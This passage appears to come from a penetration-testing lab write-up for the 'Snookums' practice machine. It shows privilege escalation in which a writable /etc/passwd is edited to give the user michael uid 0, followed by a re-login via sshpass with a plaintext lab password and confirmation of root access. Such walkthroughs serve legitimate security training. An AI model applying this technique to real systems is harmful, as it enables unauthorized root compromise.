/etc/passwd
/Practice/Snookums/5-Privilege_Escalation/attachments/{54F2A8D4-A0A2-4AF7-84EB-E40B3209EAF2}.png)
As discovered previously, the /etc/passwd file is OWNED by the michael user
[michael@snookums ~]$ vi /etc/passwd/Practice/Snookums/5-Privilege_Escalation/attachments/{B0013435-D8E1-4081-849E-ABA9D61422FA}.png)
/Practice/Snookums/5-Privilege_Escalation/attachments/{89A658C4-6A8A-479F-A9BE-AC0B6A4C7BE8}.png)
[michael@snookums ~]$ cat /etc/passwd | grep -i michael
michael:x:0:0:Michael:/home/michael:/bin/bashGiving the michael user uid=0, essentially turning him into the root account
[michael@snookums ~]$ exit
logout
Connection to 192.168.132.58 closed.Refreshing the session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ sshpass -p HockSydneyCertify123 ssh michael@$IP
[root@snookums ~]# whoami
root
[root@snookums ~]# hostname
snookums
[root@snookums ~]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:ba:d9 brd ff:ff:ff:ff:ff:ff
inet 192.168.132.58/24 brd 192.168.132.255 scope global ens192
valid_lft forever preferred_lft foreverSystem level compromise